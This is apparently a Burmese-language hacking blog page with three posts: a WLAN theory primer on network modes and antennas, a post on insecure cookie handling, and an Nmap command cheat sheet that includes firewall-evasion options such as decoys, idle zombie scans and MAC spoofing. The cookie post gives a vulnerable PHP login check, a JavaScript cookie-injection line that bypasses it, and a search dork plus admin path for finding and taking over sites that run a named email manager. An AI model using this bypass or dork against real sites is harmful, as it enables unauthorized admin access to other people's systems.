0 Wireless Local Area Network

ပထမဆံုးမိတ္ဆက္ ပို႔စ္ေလး အေနနဲ႔ ေဘာစိလည္းေရးခိုင္းတာနဲ႔ WLAN အေၾကာင္းေလး အစပ်ိဳးလိုက္ပါတယ္ ။ ဟက္နည္းေတြၾကီး လုပ္ေနတာေရာ သီအိုရီ ေရးနဲ႔ဆို ပိုၿပီး ထိေရာက္မယ္ ယူဆလို႔ တင္လိုက္ပါတယ္ဗ်ာ ။

Wireless Network ခိ်တ္ဆက္မည္ဆိုပါက ေအာက္ပါနည္းလမ္းနွစ္သြယ္ျဖင့္ခိ်တ္ဆက္နိုင္ ပါသည္။ ယင္းတို့မွာ -
၁ ) Ad.hoc Mode
၂) Infrastructure Mode
ဟူ၍ျဖစ္ပါသည္။

၁) Ad.hoc Mode (IBSS)
Ad.hoc အားတစ္နည္းအားျဖင့္ Independent Basic Service Set ဟူ၍ လည္း ေခၚပါသည္။ယင္း Ad.hoc Mode သည္ Computer အခ်င္းခ်င္း Wireless Adpater တမ်ိဳးတည္း ျဖင့္သာအသံုးျပုခိ်တ္ဆက္ျခင္းျဖစ္ပါသည္။ ထို့ခိ်တ္ဆက္မႈတြင္မည္သည့္ျကားခံပစၥည္း မွမလိုအပ္ပါ။

၂) Infrastructure Mode(BSS)
Infrastructure Mode အားတစ္နည္းအားျဖင့္ Basic Service Set ဟူ၍လည္းေခၚပါ သည္။။ယင္း Infrastructure Mode သည္ Computer အခ်င္းခ်င္းခိ်တ္ဆက္ရာတြင္း Wireless Adpater နွင့္ Wireless Access Point (or) Wireless Router တို႔ကို အသံုးျပုခိ်တ္ဆက္ျခင္း ျဖစ္ပါသည္။ ထို့ေျကာင့္ Wireless Adpater သည္အသံုးျပုသူမ်ား၏ ေရြးခ်ယ္မွု ေပးတြင္ မူတည္ပါသည္ ။
 

Wi-Fi Technology
Wi-Fi ဆိုသည္မွာ Wireless Fidelity ျဖစ္ပါသည္။ Wifi သည္ Wireless Local Area Network (WLAN) အတြက္အသံုးျပုသည့္နည္းပညာတစ္ခုျဖစ္ပါသည္။ယင္း Wifi သည္ IEEE 802.11 Standard အားအေျခခံထားျခင္းျဖစ္ပါသည္။ Wifi သည္ IEEE 802.11b Standard ျဖစ္သည့္ Frequency 2.4GHz အားအသံုးျပုခဲ့ေသာ္လည္း ေနာက္ပိုင္းတြင္ IEEE 802.11 Standard မ်ားျဖစ္သည့္ (802.11a,802.11b,802.11g,802.11n) Standards မ်ားတြင္ပါ အသံုးျပုနိုင္ပါသည္။ Wifi နည္းပညာသည္ sender နွင့္ receiver အျကား Physical Wire Connection ျဖင့္အလုပ္မလုပ္ဘဲ Radio Frequency ျဖင့္သာ Data မ်ားေပးပို့ျခင္းနွင့္လက္ခံ ျခင္းမ်ားျပုလုပ္ျကပါသည္။ RF Current မ်ားအား Antenna ဆီသို့ေပးပို့ျပီး ထိုမွတဆင့္ Electromagnetic Field ဖန္တီးကာ ေလဟာနယ္မွတဆင့္ Propagate ျပုလုပ္ေပးျခင္းပင္ျဖစ္ပါ သည္။ ထိုသို့ RF အားအသံုးျပုျပီး Data မ်ားေပးပို့လက္ခံရန္အတြက္ မည္သည့္ Wifi Network မဆို Access Point လိုအပ္မည္ျဖစ္ပါသည္။ Access Point သည္ Infrastructure Mode အတြက္အသံုးျပုေသာျကားခံပစၥည္းတစ္ခု ျဖစ္ပါသည္။ Wireless Network အတြင္း wireless client မ်ားအျပန္အလွန္ခိ်တ္ဆက္မိေစရန္ အတြက္အသံုးျပုေသာ ပစၥည္းျဖစ္သည္။ယင္း Access Point တြင္ေအာက္ေဖာ္ျပပါ Mode (၃) ခုပါ ဝင္ပါသည္-

၁) Root Mode
၂) Repeater Mode
၃) Bridge Mode တို့ျဖစ္ပါသည္။

၁) Root Mode
Root Mode ဆိုသည္မွာယင္း Access Point မွတဆင့္ Wire Network သို့ခိ်တ္ဆက္ ျခင္းျဖစ္သည္။ Access Point မွ Wire Network သို့ခိ်တ္ဆက္ရာတြင္ ယင္း Access Point တြင္ ပါရိွသည့္ Ethernet Interface ျဖင့္တိုက္ရိုက္ခိ်တ္ဆက္ပါသည္။

၂ ) Repeater Mode
Repeater Mode ဆိုသည္မွာ Access Point မွတိုက္ရိုက္ခိ်တ္ထားသည့္ အျခားေသာ Access Point မွတဆင့္ Wire Network သို့ထပ္မံခိ်တ္ဆက္ျခင္းျဖစ္သည္။တနည္းအားျဖင့္ Repeater Mode အားအသံုးျပုထားသည့္ Access Point သည္ Upstream (Root Mode) အားအသံုးျပုထားသည့္ Access Point နွင့္ခိ်တ္ဆက္ကာ Wire Network သို့ထပ္မံခိ်တ္ဆက္ ျခင္းျဖစ္ပါသည္။
၃ ) Brigde Mode
Bridge Mode ဆိုသည္မွာ မတူညီသည့္ Access Point နွစ္ခုအျကားအခ်င္းခ်င္း အျပန္ အလွန္ခိ်တ္ဆက္မိေစရန္အတြက္ အသံုးျပုေသာ Mode ျဖစ္ပါသည္။ ေနာက္ထပ္ Wireless Antenna မ်ားအေၾကာင္းကို ထပ္မံ ရွင္းၿပပါ႔မယ္ ။
Wireless Antenna မ်ား
Wireless Network အား အကြာအေဝးပိုမိုခိ်တ္ဆက္မိေစရန္နွင့္ IEEE 802.11 Standard \ Range အားတိုးခဲ့်ေစရန္အတြက္ External Antenna မ်ားအား အသံုးၿပဳဖို႔ လိုအပ္လာပါတယ္ ။ ( Hand made Antenna မ်ားၿဖင္႔ ၿပဳလုပ္ႏိုင္ေသာ္လည္း ထိေရာက္မွု သိပ္မရွိလွတာကို ေတြ႕ရပါတယ္ ) Wireless Network တြင္ အဓိက အားျဖင့္ ေအာက္ေဖာ္ျပပါ Antenna မ်ားအား အသံုးျပုျကပါသည္ ။

၁) Omni Directional Antenna
၂) Directional Antenna တို့ျဖစ္ပါသည္။


၁ ) Omni Directional Antenna

Omni Directional Antenna သည္ Common Base Antenna အမို်းအစားျဖစ္ျပီး Point-to Multipoint စနစ္ျဖစ္ပါသည္။ ယင္း Antenna သည္ အျခားေသာ Computer ၊ Laptop ၊ PDA မ်ားဆီသို့ Signal မ်ားအား Distribute ျပုလုပ္သည့္အခါတြင္ Main Antenna အျဖစ္အသံုးျပုပါသည္။ Omni Directional Antennaတြင္ Wireless Wave မ်ားသည္ 360 ဒီဂရီ အတိုင္းသြားပါသည္။ထို့ေျကာင့္ Point-to-Point system တြင္ယင္း Antenna အားအသံုး ျပုမည္ဆိုပါက Signal range နည္းမည္ျဖစ္ပါသည္။ထို့ေျကာင့္ Point-to-Point system အတြက္ Omni Directional Antenna အား recommend မျပုလုပ္ျကပါ။ Omni directional Antenna အား Indoor Unit မ်ားအတြက္သာ အသံုးမ်ားပါသည္။

၂ )Directional Antenna

Directional Antenna မ်ားအား Outdoor Unit မ်ားတြင္ အသံုးျပုျကပါသည္။ ယင္း Antenna မ်ားသည္ Signal Wave အား 45 ဒီဂရီအတိုင္းသြားပါသည္။ Directional Antenna မ်ားအား Point-to-Point System မ်ားအတြက္အသံုးျပုျကျပီး၊ တစ္ခါတစ္ရံတြင္ တပ္ဆင္သည့္အ ေပၚမူတည္၍ Multipoint System အတြက္လည္းအသံုးျပုျကပါသည္။ ေအာက္ဆံုးက အင္တင္နာဆိုရင္ ထိုင္းဘတ္ ( ၉၀၀ ) ေလာက္ ေတာ႔ ရွိပါတယ္ ။ 

0 Insecure Cookie Handling

Web Server ေတြရဲ႕　Cookie Handle အလြဲကေန　admin access ရယူသြားတဲ့　Vuln ျဖစ္ပါတယ္။
ဥပမာ　vuln.php ရဲ႕　Code ကို　တစ္ခ်က္ၾကည့္လိုက္ပါ　။

Code

if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }

သူ႕မွာ 　လြဲသြားတဲ့အေၾကာင္းအရာက　"is_user_logged"　ဆိုတဲ့　Variable ျဖစ္ပါတယ္　Browser　ထဲက　Cookie　ရွိရင္　Vale 1 အျဖစ္သတ္မွတ္ျပီး　Log in အ၀င္ခံလိုက္တဲ့　သေဘာပါ　အဲ့ဒီ့မွာပဲ

javascript:document.cookie = "is_user_logged=1; path=/";

ဆိုျပီး　Javascript Inject လုပ္လိုက္ရံုနဲ႕　Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္　။

Online Email Manager မွာ　ေပါက္သြားတဲ့　Vuln အေၾကာင္းၾကည့္လုိက္ရင္　ပိုျပီး　သေဘာေပါက္သြားမွာပါ　။

DorK : Powered by Online Email Manager

အဲ့ဒီ့မွာ　http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕　အဲ့ဒီ့မွာ

javascript:document.cookie = "auth=admin; path=/";　လို႕　Javascript Inject လုပ္လိုက္ျပီး　emailList.php (　http://www.site.com/demo/OEM/admin/emailList.php　)

ကိုသြားလိုက္ရံုနဲ႕　 Admin အျဖစ္　Login ၀င္ေနျပီးသားျဖစ္တာ　ေတြ႕မွာပါ

0 Nmap Kung-Fu {Basic Scanning technique}

Nmap ဆိုတာနဲ ့ pentest သမားေတြေကာ ဟက္ကာၾကီးေတြေကာ လက္စြဲထားရတာ ၾကားဖူးၾကမယ္ထင္ပါတယ္ ... host / server / system တစ္ခု စေဖာက္ဖို ့ဆို အရင္ဆံုး/ပထမဆံုး step အၿဖစ္ nmap ကအဓိကေနရာက ပါဝင္လုပ္ေဆာင္ပါတယ္ ... window သမားေတြအတြက္လည္းရွိပါတယ္.. ဒါေပမယ့္ window မွာသံုးရတာေတာ့ တမ်ိဳးပဲဗ် က်ေနာ့္အထင္ ... 

nmap ဆိုတာဘာလဲ >>> http://nmap.org/
window သမားေတြအတြက္ >>> http://nmap.org/book/inst-windows.html
Nmap Online tool >>> http://nmap-online.com/ // မိုက္လယ္ဟ online ရွိပီးသား... ခုမွတိတယ္... ဟီး....

ေအာက္မွာ nmap ရဲ ့ basic scanning techniques ေလးေတြကိုေတြ ့ရမွာပါ ... အေတာ္အသံုးဝင္ပါတယ္ ... ခုေလာေလာဆယ္ လိုတယ္လို ့ေမာင္ဒုတ္ မေၿပာပါဖူး ... ေနာင္တစ္ခ်ိန္ လိုကိုလိုလာပါလိမ့္မယ္.. အဲ့ခ်ိန္က်ရင္ ဒီပို ့စ္ေလးကို သတိရရင္ပဲ .. ပို ့တင္ရက်ိဳး နပ္ပါတယ္ .. 

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl [time] [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout [time] [target]

Minimum Scan delay —-> nmap –scan-delay [time] [target]

Maximum scan delay —-> nmap –max-scan-delay [time] [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every [time] [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

./preview

  

credit:http://pentestlab.wordpress.com/